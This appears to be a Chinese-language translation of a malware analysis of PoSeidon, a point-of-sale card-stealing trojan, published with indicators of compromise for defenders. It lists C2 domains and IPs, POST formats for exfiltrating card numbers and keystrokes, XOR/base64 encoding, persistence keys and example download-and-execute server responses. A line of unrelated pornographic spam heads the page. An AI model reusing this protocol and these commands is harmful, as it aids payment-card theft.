压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

迄今為止最為復雜的PoS機惡意軟件PoSeidon

責編:admin |2015-03-24 19:25:52

思科安全解決方案(CSS)的研究人員們最近發現了一款新的針對PoS系統的惡意軟件PoSeidon,這款惡意軟件極為復雜,被稱為是迄今為止最為復雜的PoS惡意軟件。

當顧客在零售店購買商品時可能會用到PoS系統。使用信用卡或者借記卡,PoS系統就會讀取信用卡背面磁條上儲存的信息。一旦信息從商家處被竊取,它就能被編碼進磁條,從而做出一張新卡。黑市會有賣這種信息,因為攻擊者能夠輕易地將竊取到的信用卡數據變現。涉及PoS惡意軟件的事件數量一直在上升,影響了那些大公司,也影響了那些夫妻作坊式的小店,還吸引了很多媒體的關注。正是因為存在大量金融和個人信息,這些公司和PoS系統會一直成為對攻擊者們極富吸引力的目標。

概況

今天要介紹的是一款新的針對PoS系統的惡意軟件,這款軟件會在PoS內存中尋找信用卡信息,并將這些信息發送到服務器,服務器使用了。ru頂級域名,這些信息可能會被重新賣出去。這個新的惡意軟件家族(我們取名為PoSeidon)中有些組件,如下圖所示:

20150324101310941

  首先它會加載Loader,它會試圖留存在目標系統中,防止系統重啟。Loader之后會聯系命令與控制(command and control)服務器,接收一個包含另一個程序的URL,并下載執行。下載下來的程序是FindStr,它會安裝一個鍵盤記錄器,并且在PoS設備中掃描數字序列,這些數字序列就有可能是信用卡號碼。如果經過驗證,這些數字確實是信用卡號碼,鍵盤記錄和信用卡號碼就會被編碼并發送到一個服務器。

技術細節

鍵盤記錄器

這個文件的SHA256校驗值是334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4,可能是PoS系統攻擊的源頭。我們把這個文件叫做鍵盤記錄器(KeyLogger)是基于它的調試信息:

20150324101335528

  一旦被執行,這個文件就會把自身復制到%SystemRoot%\system32\<filename>.exe或者是%UserProfile%\<filename>.exe,并在HKLM(或者HKCU)\Software\Microsoft\Windows\CurrentVersion\Run處加入注冊表項。

這個文件還會打開HKCU\Software\ LogMeIn Ignition,打開并刪除PasswordTicket鍵值,獲取Email鍵值,它還會刪除注冊表目錄樹HKCU\Software\LogMeInIgnition\<key>\Profiles\*。

文件會使用POST方法把數據發送到下列URI中的一個地址:

wondertechmy[.]com/pes/viewtopic.php

wondertechmy[.]ru/pes/viewtopic.php

wondwondnew[.]ru/pes/viewtopic.php

URI格式是

uid=%I64u&win=%d.%d&vers=%s

20150324101414932

  鍵盤記錄器組件是用來竊取密碼的,也有可能是感染機器的初始途徑。

Loader

我們把這個文件叫做loader是基于它的調試信息:

20150324101435593

  一經運行,Loader會檢查它是不是以以下兩個文件名執行的:

WinHost.exe

WinHost32.exe

如果不是,它就會確保沒有以WinHost名字正在運行的Windows服務。Loader會將自身復制到%SystemRoot%\System32\WinHost.exe,覆蓋掉那里任何可能以相同名字命名的文件。接下來,Loader會啟動一個名為WinHost的服務。

20150324101458798

  之所以要這么做是因為即使當前用戶注銷,它也要留在內存中。如果Loader不能將自己變成服務,它就會把在內存中的自己的其他實例終止掉。然后將自身復制到%UserProfile%\WinHost32.exe,并且安裝注冊表鍵HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32。最后,它會創建一個新進程執行%UserProfile%\WinHost32.exe。

既然現在它可以一直留在系統中了,Loader就會執行下面的命令將自己刪除:

cmd.exe /c del <path_to_itself> >> NUL在內存中運行的Loader會嘗試讀取%SystemRoot%\System32\WinHost.exe.cfg這里的配置文件。這份文件中有一個URL列表,這些URL列表是要被加到已經被硬編碼到Loader的URL列表里的。

然后Loader會聯系其中某個被硬編碼的C&C服務器:

20150324101519879

  linturefa.com

xablopefgr.com

tabidzuwek.com

lacdileftre.ru

tabidzuwek.com

xablopefgr.com

lacdileftre.ru

weksrubaz.ru

linturefa.ru

mifastubiv.ru

xablopefgr.ru

tabidzuwek.ru

對應的IP地址:

151.236.11.167

185.13.32.132

185.13.32.48

REDACTED at request of Federal Law Enforcement31.184.192.19691.220.131.116

91.220.131.87

如果上面的某個域名解析到了某個IP地址,程序就會發送HTTP POST請求,請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)POST數據會被發送到:

<IP ADDRESS>/ldl01/viewtopic.php

<IP ADDRESS>/pes2/viewtopic.php

POST數據格式為:

uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s

QQ截圖20150411192225

  Loader應從C&C服務器獲取這樣的回應:

{<命令字符(CommandLetter)>:<參數(ArgumentString)>}

示例:

{R:http://badguy.com/malwarefilename.exe}

{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}

20150324101644794 (1)

  獲取和執行了服務器響應中的可執行文件,PoSeidon的第二部分登場了。

FindStr

我們把這個文件叫做FindStr是基于它的調試信息:

20150324101706659

  這個文件會在系統中安裝一個很小的鍵盤記錄器,這個鍵盤記錄器和這里的描述極為相似。這個鍵盤記錄器截獲的數據稍后會被發送至服務器。

這個惡意軟件會在內存中尋找特定的數字序列:

以6, 5, 4開頭的16位數字 (Discover, Visa, Mastercard信用卡)以3開頭的15位數字(AMEX信用卡)然后它會使用Luhn算法驗證這些數字是不是真的信用卡或借記卡號碼,代碼片段如下:

20150324101740341

  接下來,它會嘗試解析下面的這些域名,其中有些域名是很有名的數據竊取服務器:

quartlet.com

horticartf.com

kilaxuntf.ru

dreplicag.ru

fimzusoln.ru

wetguqan.ru

如果上面的某個域名解析到了某個IP地址,程序就會發送HTTP POST請求,請求使用下面的user-agent字串:

Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0)POST數據會被發送到:

<IPADDRESS>/pes13/viewtopic.php

20150324101809530

  數據格式為:

oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s

20150324101824492

  可選的POST數據(data:信用卡號碼,logs:鍵盤記錄數據)&data=<與0x2A 進行了XOR運算,然后再base64編碼的數據>&logs=<與0x2A進行了XOR運算,然后再base64編碼的數據>發送到服務器上的信用卡號碼和鍵盤記錄器的數據都是經過XOR運算并且用base64編碼了的。

服務器的回應應該是:

20150324101850800

  這個機制可以讓惡意軟件根據從服務器收到的指令進行自我更新。

Loader vs FindStr

20150324101929631

  使用Bindiff對未打包的Loader(版本11.4 )和未打包的FindStr(版本7.1)進行對比,結果顯示62%的函數相同。惡意軟件背后的攻擊者可能開發了某些核心函數,并將它們編譯進庫,然后他們開發的其他項目可以直接使用這些函數了。

IOC

點擊查看終端IOC版本

Win.Trojan.PoSeidon.RegistryItem.ioc

Win.Trojan.PoSeidon.ProcessItem.ioc

Win.Trojan.PoSeidon.FileItem.ioc

域名

linturefa.com

xablopefgr.com

tabidzuwek.com

linturefa.ru

xablopefgr.ru

tabidzuwek.ru

weksrubaz.ru

mifastubiv.ru

lacdileftre.ru

quartlet.com

horticartf.com

kilaxuntf.ru

dreplicag.ru

fimzusoln.ru

wetguqan.ru

IP地址:

151.236.11.167

185.13.32.132

185.13.32.48

REDACTED at request of Federal Law Enforcement31.184.192.19691.220.131.116

91.220.131.87

REDACTED at request of Federal Law Enforcement

結論

PoSeidon是又一個針對PoS系統的惡意軟件,它顯示出其作者的高超技術。攻擊者會繼續針對PoS系統進行攻擊,并且使用各種混淆手段逃避檢測。只要PoS攻擊能夠提供回報,攻擊者們就會繼續研發新的惡意軟件。網絡管理員們應該要保持警惕,并且使用最佳解決方案保證免受這些惡意軟件的攻擊

上一篇:小漏洞大影響:來看看希爾頓酒店官網的CSRF漏洞

下一篇:谷歌正為Gmail開發PGP端到端加密技術